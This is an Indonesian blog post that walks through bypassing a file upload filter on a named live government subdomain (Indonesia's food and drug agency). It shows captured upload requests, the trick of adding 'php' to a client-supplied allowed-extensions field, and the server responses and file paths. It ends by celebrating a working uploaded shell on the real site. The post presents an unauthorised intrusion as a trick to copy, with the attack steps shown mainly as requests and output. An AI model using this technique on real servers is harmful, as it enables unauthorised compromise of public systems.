Bypass filter extension in Unrestricted File Upload - With Inspect Element

 


-

Hai Sobat

Saya ikal,

Disini Saya akan bawakan sebuah trik nih

-


Sesuai judul kita kali ini, disini kita masih membahas sebuah trik yang memakai fiture Inspect Element. Okeh ini berhubungan dengan Arbitrary File Upload atau Unrestricted File Upload, ya intinya Upload - Upload sewenang wenang :D.


Disini kita akan mempraktekannya di salah satu subdomain website Badan Pengawas Obat dan Makanan (POM). yang beralamatkan https://bpomsvr-0170.pom.go.id/ .



Disini Unrestricted File Upload Terjadi di form registrasi, disana sudah terdapat form registrasi jadi kalian tinggal mengklik saja, dan secara otomatis kalian akan diarahkan ke page registrasi.



Isi form yang ada lalu klik lanjut, isi asal saja dan ikutin arahan yang ada dari server.



isi kembali form yang ada lalu klik lanjut. (Isi asal saja).



Nah disini lah kita akan berksperimen :D, First kita upload shell dengan extensi .php dan hasilnya akan seperti dibawah ini



Format File Tidak Diperbolehkan!


 File tidak diperbolehkan :D, Coba kita upload file dengan extensi .jpg dan hasilnya akan seperti dibawah ini



File berhasil terupload dan server mencantumkan letak filenya :D, Bagaimana jika kita upload file dengan extensi .jpg lalu kita lakukan tamper data dan mengubah extensinya menjadi .php , Lets Try


Disini saya akan lakukan tamper data menggunakan Inspect Element yo, Bagi yang belum tau caranya bisa kunjungin post sebelumnya atau bisa klik saja link ini https://www.draxploit.web.id/2020/11/tamper-data-with-inspect-element-fiture.html



Disini saya mengupload sebuah pure gambar dengan nama DX.jpg, dan inilah request yang ditangkap. biar lebih jelas requestan yang ditangkap tadi saya taruh dibawah.


-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="action"


upload

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="kdDok"


01

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"


jpg;jpeg;pdf

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="maxsize"


5242880

-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="files"; filename="DX.jpg"

Content-Type: image/jpeg


ÿØÿà


Hmmmm, Saya ganti extensinya menjadi .php dan response servernya seperti ini



{"status":"false", "error":"Format File Tidak Diperbolehkan!", "path":"docs/reg/2020/12/1122281372/1122281372-01-20201210215118.php", "urll":"https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMTUxMTgucGhw/DX.php", "ext":"php", "rename":"1122281372-01-20201210215118.php", "name":"DX.php", "filename":"DX", "size":"27826"}


Status = false, atau gagal terkirim. Hmmz namun terlihat letak filenya, coba kita akses saja https://bpomsvr-0170.pom.go.id/docs/reg/2020/12/1122281372/1122281372-01-20201210215118.php 



File tidak ada, Hmmmzzz. Mari kita coba lihat kembali requestan diatas, disini saya mencurigai salah satu requestannya yaitu 


-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"


jpg;jpeg;pdf


Bagaimana jika ini extensi yang diperbolehkan, Bagaimana jika kita tambahkan satu extensi lain seperti ini lalu kita langsung mengupload file dengan extensi .php


-----------------------------12517111096057299861026348551

Content-Disposition: form-data; name="format"


jpg;jpeg;pdf;php


Lets Try again :D.


Isi request : 

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="action"


upload

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="kdDok"


01

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="format"


jpg;jpeg;pdf;php

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="maxsize"


5242880

-----------------------------2534607582979961701751904158

Content-Disposition: form-data; name="files"; filename="whoopsy.php"

Content-Type: application/octet-stream


Dan ketika saya kirim requestannya, response yang saya dapat seperti ini



{"status":"true", "error":"", "path":"docs/reg/2020/12/1122281372/1122281372-01-20201210220417.php", "urll":"https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMjA0MTcucGhw/whoopsy.php", "ext":"php", "rename":"1122281372-01-20201210220417.php", "name":"whoopsy.php", "filename":"whoopsy", "size":"179123"}

Status = true, mari kita cek filenya :D. https://bpomsvr-0170.pom.go.id/index.php/download/data/ZG9jcy9yZWcvMjAyMC8xMi8xMTIyMjgxMzcyLzExMjIyODEzNzItMDEtMjAyMDEyMTAyMjA0MTcucGhw/whoopsy.php


Tidak tereksekusi, bagaimana jika kita akses path satunya lagi yaitu di https://bpomsvr-0170.pom.go.id/docs/reg/2020/12/1122281372/1122281372-01-20201210220417.php 


And Look it this shit :D, Mission Success dude :D.

Okeh segini saja untuk artikel kali ini,
Thanks
See U
Tags:
Haikal_

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi eu sem ultrices, porttitor mi eu, euismod ante. Maecenas vitae velit dignissim velit rutrum gravida sit amet eget risus. Donec sit amet mollis nisi, nec commodo est.